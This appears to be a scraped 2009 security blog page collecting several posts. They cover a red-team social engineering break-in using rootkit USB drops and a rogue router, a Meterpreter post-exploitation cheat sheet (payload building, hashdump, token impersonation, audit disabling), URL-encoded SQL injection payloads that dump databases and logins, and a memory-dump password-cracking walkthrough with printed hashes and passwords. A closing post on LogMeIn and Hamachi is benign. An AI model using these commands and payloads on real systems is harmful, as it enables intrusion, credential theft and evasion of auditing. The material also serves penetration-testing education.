Social Engineering: Anatomy of a Hack

From: www.csoonline.com

Social Engineering: Anatomy of a Hack

How a social engineering expert gained access to extremely
sensitive information with little more than a thrift-shop shirt, a plate of cookies and a Linksys box




by Joan Goodchild, Senior Editor,
CSO
February 04, 2009


As the founder of Lares, a Colorado-based security consultancy,
social-engineering expert Chris Nickerson is often asked by clients to
conduct penetration testing of their on-sight security. Nickerson leads
a team which conducts security risk assessments in a method he refers
to as Red Team Testing. Watch Nickerson and his team pull off a diamond
heist in this video.


Nickerson and crew recently took on such an exercise for a client he
describes as "a retail company with a large call center." With some
prep work, Nickerson says the team was able gain access to the
company's network and database quite easily. Read on to find out how
they did it, and what lessons you can take away for shoring up your organization's defenses. (To learn more about social engineering techniques, also see Social Engineering: Eight Common Tactics.)


Chris Nickerson: On-site security vulnerability testing
requires the most memory and intelligence gathering because you need to
start off by gaining information on your target. When I'm doing my
information gathering, I like to find holiday or time-relative events.
In this particular exercise, there was a large horserace going on in
the area. In the town where the company was located, it was the big
thing to go to this horse race. Everyone in the city and around it
geared up and left the office to go to it. That was a perfect time for
me to come in and say I have an appointment.

I said I had to meet with someone we'll call Nancy. I knew Nancy wasn't going to be in the office because on her MySpace profile it said she was getting ready to go to the race. Then her Twitter profile said she was getting dressed to go to the event. So I knew she wasn't in the office.

Before I went to the office, I went to a thrift shop and got a Cisco
shirt for $4. Then I went in and said "Hi. I'm the new rep from Cisco.
I'm here to see Nancy." The front desk attendant in this situation said
"She's not at her desk."

I said "Yeah. I know. I've been texting back and forth with her. She told me she is in a meeting and the meeting is going over."

This was right around lunch time and I said "Since I'm waiting, is
there anywhere around here where I can go get some food?" I knew full
well that after surveying the area the closest thing was about five
miles away because they were sort of out in the sticks.

The receptionist said "Four or fives miles down the road there is a McDonalds. But we have a nice cafeteria here. If you want, you can just eat in there."

Being allowed to go to the cafeteria gave me full access to the
facility because the only thing that was guarded was the door. The
cafeteria lead right into the rest of the building.

So I went into the cafeteria and ate. While I was there, I did USB key
drops. I put files on them with names like 'Payroll' or 'Strategy
2009.' The USBs had rootkits on them. Many contained an autorun
rootkit. Others had Hacksaw, which is a little piece of tech that you
can use with a U3 drive. You plug it into a machine and, if the machine
has auto run on the CD-Rom running it, it will just start dumping all
the passwords, usernames, all that. It will also put a hook into the
machine to start emailing that information out to an email account that
you give it to contact. So, even after I left, I could still be
filtering information. It only takes about 30 seconds to enable itself.

When I do this kind of exercise, I put USBs in areas that people are in
where they might forget something: The bathroom, for instance, on the
sink. Another good area is near the coffee machine. Areas where people
naturally put things down where they might not remember to pick it back
up. I've never done USB key drops without success.

Meanwhile, I had another one of my guys go in through the smoking
door in the back. He hung out, waited, had some cigarettes with people
who came out to smoke on break, and when they were done, the door
opened and he just cruised in. Yet another exercise to prove it really
doesn't take much to get inside.

Eventually, once he was in, I had him come and get me in the
cafeteria. That was so it appeared on the security tapes as though
someone was coming to get me out of the cafeteria to escort me to
whatever meeting I was going to attend. We went through and found
inside of this giant 100,000-square-foot cube farm a few seats that
were wide open and just sat down.

There was no one around us. So, we started pulling keys. We used things
like Ophcrack to start cracking Windows passwords and dump them into
Linux. We started putting our machines on the networks so we could
start doing pen testing and hacking active servers in the environment.
We put up things like WRT 54G routers: the little blue Linksys
wireless units. We took those, stuck them under a cube, put Unix on
them and opened WRT. That made it so I had a wireless access point I
could hit not only from the parking lot, but it also beacons and calls
home so I had a Unix box that sits inside their network.

A short time later, a full team of people came in. A lot of the work
that was done at this facility was shift work, and it was shift change
time. Because we did our homework right, we were at the two of three
cubes that were vacant so there were no conflicts or questions.

Everyone sat down around us. I announced myself as the Cisco engineer
who was working on the phone system. Many of them responded with jokes
and said things like "Honey, please don't fix it. I don't want to take
any calls today."

One thing I have learned is that cookies are the keys to everyone's
heart. When I'm doing the type of exercise where I'm posing as a tech,
or a VAR, I like to bring cookies. I did for this exercise and I
started passing out cookies to everyone in the area. We were all
laughing, having a great time. Meanwhile, we were in the middle of hacking their entire network.

In the end, what we exposed for the client was the vulnerability of
their physical access and we showed them some of the blended techniques
we used to get in. We were able to demonstrate how, with social
engineering, we were able to hack the SQL Server and dump the whole
data base of everybody's account information. This kind of breach could
have cost them multiple billions of dollars. And we had access to all
of it because of these vulnerabilities. We wore button cams and hat
cams so they could watch how it was done.

Companies need to run a general social engineering awareness
campaign. You need to tell employees what to look for and how to look
for it. Companies need to teach employees that it's not that the
company doesn't trust the people within the organization, it's that
there are people out there trying to do this every day. It is just a
good awareness technique to do it.

If someone is coming to work on your environment, you should
probably know who they are. If you think of your company like your
home, you do things differently. You are not going to just let someone
walk into your house. That is the kind of philosophy companies need to
inject into corporate culture.

©

CXO Media Inc.
  • By JF
  • June 10th, 2009
  • Posted in Security
  • 400 views
  English (US) latin1  
 

Meterpreter Post exploitation - Recap

Copy-paste from here: http://laramies.blogspot.com/2009/04/meterpreter-post-exploitation-recap.html



I have been a big fan of Meterpreter since it first version, now i would like to review the different cool things and plugins that are around for this feature of Metasploit, that covers the post-exploitation phase. As explained in the first Meterpreter paper:

Meterpreter, short for The Meta-Interpreter, is an advanced payload that is included in the Metasploit Framework. Its purpose is to provide complex and advanced features that would otherwise be tedious to implement purely in assembly. The way that it accomplishes this is by allowing developers to write their own extensions in the form of shared ob ject (DLL) ?les that can be uploaded and injected into a running process on a target computer after exploitation has occurred. Meterpreter and all of the extensions that it loads are executed entirely from memory and never touch the disk, thus allowing them to execute under the radar of standard Anti-Virus detection.


First of all, i would like to remark that i use Meterpreter as a standalone binary most of the times. To create a binary for uploading to a server you can use this command:

./msfpayload windows/meterpreter/bind_tcp LPORT=443 X > mymeterpreter.exe

Once uploaded the binary and executed (i leave this to you), you have to launch the multi_handler exploit to manage the connection to meterpreter, in this case:

./mscli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E

Or inside the metasploit console:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(handler)> set LPORT 443
msf exploit(handler)> exploit

Well once we have a working connection, these are some things that you can do:

-Port forwarding: You can make port redirections,

meterpreter> portfwd -a -L 127.0.0.1 -l 444 -h destiny -p 3389

-L = ip that will hold the listening port
-l = the listening port
-h = the target host
-p = the target port

Now you should connect to the exploited machine on port 444

More on forwarding and routing here


-HashDumps:

You can get the hashes of the user accounts, like the pwdump utility, for later cracking.

meterpreter> use privs (we load the privileges module)
meterpreter> hashdump

You need Admin/System privileges to work.

-User impersonation, using the token passing technique:

You can use meterpreter for performing the "pass the token" attack to impersonate another user, introduced by Luke Jennings:

meterpreter> use incognito (we load the incognito module)
meterpreter> list_tokens (we list all available sessions)
meterpreter> impersonate_token oracle-en\\Administrator (we impersonate as the user oracle-en\\Administrator)

You need Admin/System privileges to work.

If you want to revert the situation an obtain your original session, you can execute:

meterpreter> rev2self

More on working with Incognito and Meterpreter at Carnal0wnage

Dumping memory to extract hashes (using mdd.exe):

Here we first need to upload mdd.exe (Mantech)

meterpreter> upload mdd.exe .
meterpreter> execute -f mdd.exe -a "-o mydump.dd"
meterpreter> download mydump.dd .

Now we need can use volatility to:

  • cachedump Dump (decrypted) domain hashes from the registry
  • hashdump Dump (decrypted) LM and NT hashes from the registry
  • hivelist Print list of registry hives
  • hivescan Scan for _CMHIVE objects (registry hives)
  • lsadump Dump (decrypted) LSA secrets from the registry

More information on using meterpreter + mdd + volatility on Attack Research blog

Another resource for Meterpreter plugins is the DarkOperator website, where we can find some modules like:

  • Disable_Audit: Disable auditing, by changing the local security policy
  • GetGui: Script for enabling RDP service on target host.
  • GetTelnet: this script will enable the Telnet Service on Win2003 and XP, and will install it on Vista and 2008.
  • Memdump: Automation for mdd
  • WinEnum: Script that will gather a big amount of information about the host
  • Scheduleme: this will allow for task scheduling on target host. Will run the commands as System.
  • NetEnum: Performs network enumeration, ping sweeps, reverse dns lookups, etc.
  • Soundrecorder: Allows you to record sound on the target machine :)
  • GetCounterMeasure: this script will identify antivirus,HIPS,HIDS, Firewalls, etc.

You can find examples of these modules and the source code in the the Darkoperator website under the meterpreter zone, many of them are included in the Metasploit project.


Meterpreter service wrapper:

You can use Metsvc to run meterpreter as a Windows service, or as a command line application. You have to download from Phreedom.org (Alexander Sotirov)

c:> metsvc.exe install-service (it will launch on port 31337)


Well that's all for now, i will like to thanks Chris Gates and Carlos Perez (DarkOperator) for their work with Meterpreter, a great tool for post exploitation and maybe a feature underestimated by many and unknown by others.

Also a big thanks for all the Metasploit team, for their great work.

Enjoy your post exploitation ...

-CMM



  • By JF
  • April 24th, 2009
  • Posted in Security
  • 1788 views
  English (US) latin1  
 

SQL mapping

Use the following SQL queries to get information about a MSSQL database:

List of databases on the server

    USE MASTER

    SELECT dbid, name
    FROM SYSDATABASES

List all the tables in a database

    USE 

    SELECT id, name
    FROM SYSOBJECTS
    WHERE xtype = 'U'

List of all columns in the system

>

    SELECT tab.id, tab.name,
    col.colid, col.name,
    col.type, typ.name, col.length,col.isnullable
    FROM SYSCOLUMNS col

    INNER JOIN SYSOBJECTS tab
    ON col.id = tab.id
    AND tab.xtype = 'U'

    INNER JOIN SYSTYPES typ
    ON col.type = typ.type
    AND col.xtype = typ.xtype
    and col.xusertype = typ.xusertype

List of all relationships in the system

    USE 

    SELECT DISTINCT
    RO.name,
    RCOL.name,
    FO.name,
    FCOL.name

    FROM SYSFOREIGNKEYS FK

    INNER JOIN SYSCOLUMNS FCOL
    ON FK.fkeyid = FCOL.id
    AND FK.fkey = FCOL.colid

    INNER JOIN SYSCOLUMNS RCOL
    ON FK.rkeyid = RCOL.id
    AND FK.rkey = RCOL.colid

    INNER JOIN SYSOBJECTS FO
    ON FK.fkeyid = FO.id

    INNER JOIN SYSOBJECTS RO
    ON FK.rkeyid = RO.id

List of all Database Types

    FROM SYSTYPES

Or as SQLi queries for queries requiring 4 return values with the second being a string:

relations:

%27)%20UNION%20SELECT%20DISTINCT%201,RO.name%2B%27.%27%2BRCOL.name%2B%27-%3E%27%2BFO.name%2B%27.%27%2BFCOL.name,3,4%20FROM%20SYSFOREIGNKEYS%20FK%20INNER%20JOIN%20SYSCOLUMNS%20FCOL%20ON%20FK.fkeyid%20=%20FCOL.id%20AND%20FK.fkey%20=%20FCOL.colid%20INNER%20JOIN%20SYSCOLUMNS%20RCOL%20ON%20FK.rkeyid%20=%20RCOL.id%20AND%20FK.rkey%20=%20RCOL.colid%20INNER%20JOIN%20SYSOBJECTS%20FO%20ON%20FK.fkeyid%20=%20FO.id%20INNER%20JOIN%20SYSOBJECTS%20RO%20ON%20FK.rkeyid%20=%20RO.id;--

columns:

%27)%20union%20SELECT%201%20,%20tab.name%2b%27,%27%2bcol.name%2b%27,%27%2btyp.name,%202,%203%20FROM%20SYSCOLUMNS%20col%20INNER%20JOIN%20SYSOBJECTS%20tab%20ON%20col.id%20=%20tab.id%20AND%20tab.xtype%20=%20%27U%27%20INNER%20JOIN%20SYSTYPES%20typ%20ON%20col.type%20=%20typ.type%20AND%20col.xtype%20=%20typ.xtype%20and%20col.xusertype%20=%20typ.xusertype;--

databases:

%27)%20union%20SELECT%20dbid,name,3,4%20FROM%20master..SYSDATABASES--

objects:

%27)%20union%20SELECT%20id,name,3,4%20FROM%20SYSOBJECTS%20WHERE%20xtype%20=%20%27U%27;--

logins:

%27)%20union%20SELECT%201,name+fullname,3,4%20FROM%20master..syslogins;--
%27)%20union%20SELECT%201,name,3,4%20FROM%20master..syslogins;--
  English (US) latin1  
 

Getting passwords from memory dumps

Copy-paste from here:

------------------------------------------------------------------
Using Volatility (1.3_Beta), Volatility Plugin from Moyix, a test RAM Image (xp-laptop-2005-06-25.img) and a Windows Hash/Password Finder (SamInside or Cain and Abel) identify the passwords for the following users: Sarah, phoenix and the Administrator.

1. Run hivescan to get hive offsets

command: python volatility hivescan -f "C:\Dump\xp-laptop-2005-06-25.img"

Offset (hex)
42168328 0x2837008
42195808 0x283db60
47592824 0x2d63578
207677272 0xc60e758
207736840 0xc61d008
207759192 0xc622758
207822 ***** Truncated to save some space

2.Run hivelist with the first hivescan offset


command: python volatility hivelist -f "C:\Dump\xp-laptop-2005-06-25.img" -o 0x2837008

Address Name
0xe1ecd008 \Documents and Settings\Sarah\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1eff758 \Documents and Settings\Sarah\NTUSER.DAT
0xe1bf9008 \Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c26850 \Documents and Settings\LocalService\NTUSER.DAT
0xe1bf1b60 \Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c2a758 \Documents and Settings\NetworkService\NTUSER.DAT
0xe1982008 \WINDOWS\system32\config\software
0xe197f758 \WINDOWS\system32\config\default
0xe1986008 \WINDOWS\system32\config\SAM
0xe197a758 \WINDOWS\system32\config\SECURITY
0xe1558578 [no name]
0xe1035b60 \WINDOWS\system32\config\system
0xe102e008 [no name]

3. Find Password Hash (-y System Hive Offset)(-s SAM Hive Offset) and Send to Text File.

Command: volatility hashdump -f "C:\Dump\xp-laptop-2005-06-25.img" -y 0xe1035b60 -s 0xe1986008>Password_Hash.txt

Administrator:500:08f3a52bdd35f179c81667e9d738c5d9:ed88cccbc08d1c18bcded317112555f4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:ddd4c9c883a8ecb2078f88d729ba2e67:e78d693bc40f92a534197dc1d3a6d34f:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:8bfd47482583168a0ae5ab020e1186a9:::
phoenix:1003:07b8418e83fad948aad3b435b51404ee:53905140b80b6d8cbe1ab5953f7c1c51:::
ASPNET:1004:2b5f618079400df84f9346ce3e830467:aef73a8bb65a0f01d9470fadc55a411c:::
Sarah:1006:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::


4.Import Password_Hash.txt into a Password Finder (SamInside, Cain and Abel...).

User: Sarah Password: Empty
User: phoenix Password: Neon96
User: Administrator Password: Neon1996
------------------------------------------------------------------

I've tried this on a few memory images of my own, from a laptop I dumped the memory through firewire. It works like a charm, though Ophcrack had some problems finding the actual passwords. Rcrack on the other hand (with a slightly larger set of tables...66gb instead of 600mb) found all passwords in the memory, even the ones that were just plain gibberish-passwords with mostly 'shift-number' signs ('!','(','~', etc).

It's a very nice trick I'm happy I found :)

Now just finding a way to find the passwords from mscache hashes (which are in the memory too, btw) ;)

  • By JF
  • February 2nd, 2009
  • Posted in Security
  • 1120 views
  English (US) latin1  
 

Playing with LogMeIn and Hamachi

Well, I just finished a program (thanks Irongeek for showing me AutoIt) for a client which detects installations of LogMeIn and Hamachi on other systems for him.
To build it, I had to install both programs to see how I can detect their presence. After having installed the programs on some VM's, I thought it fun to try and see what the programs do.

Well, they do exactly as advertised:

  • Hamachi gives a near passwordless access to your network and machines on said network.
  • LogMeIn gives remote desktop access to the systems on which you installed it, guarded by passwords of course.

At least Hamachi is obvious in it's insecurity: Very little in the way of security is required, you create a 'personal vpn' by typing a name and optionally entering a password. Some brute-forcing will probably give you a shitload of networks and access to the systems on those networks.

LogMeIn on the other hand is a lot more sinister: You have to log in to the LogMeIn website using your email address and password (over SSL of course). There you can access the list of computers on which you installed LogMeIn. Some clicking and you get to the "Log in to your domain" screen (I installed it on a computer connected to a domain in VMWare). This was not the Microsoft login-box but a webform in which you should enter your username, password and domain (dropdown). After entering those details, there you go, access to the desktop with some nice fancy Java applet.

So, what's wrong with that? Nothing, at first glance. Except for the fact that you have to type your username and password to your domain into a form hosted on the systems of LogMeIn. They say they won't store it and whatever, but as with many things I have no control over, I don't trust that. What guarantee do I have that they will keep their word? There is no way to check, as I have no access to their source code, databases or configuration.

Frankly, after seeing the way it works (which is flawless), I think I'll just pass on those easy-to-use-vpn-through-our-network-so-you-dont-have-to-do-anything-but-install-our-software programs and keep things the nice and hard way: Get myself a dyndns account, install openvpn on my server, forward port on router to server, install openvpn on my laptop and be happy with it.

  English (US) latin1  
 
<< 1 2 3 4 5 6 7 >>
Free counter and web stats LBVD Word Netherlands DealExtreme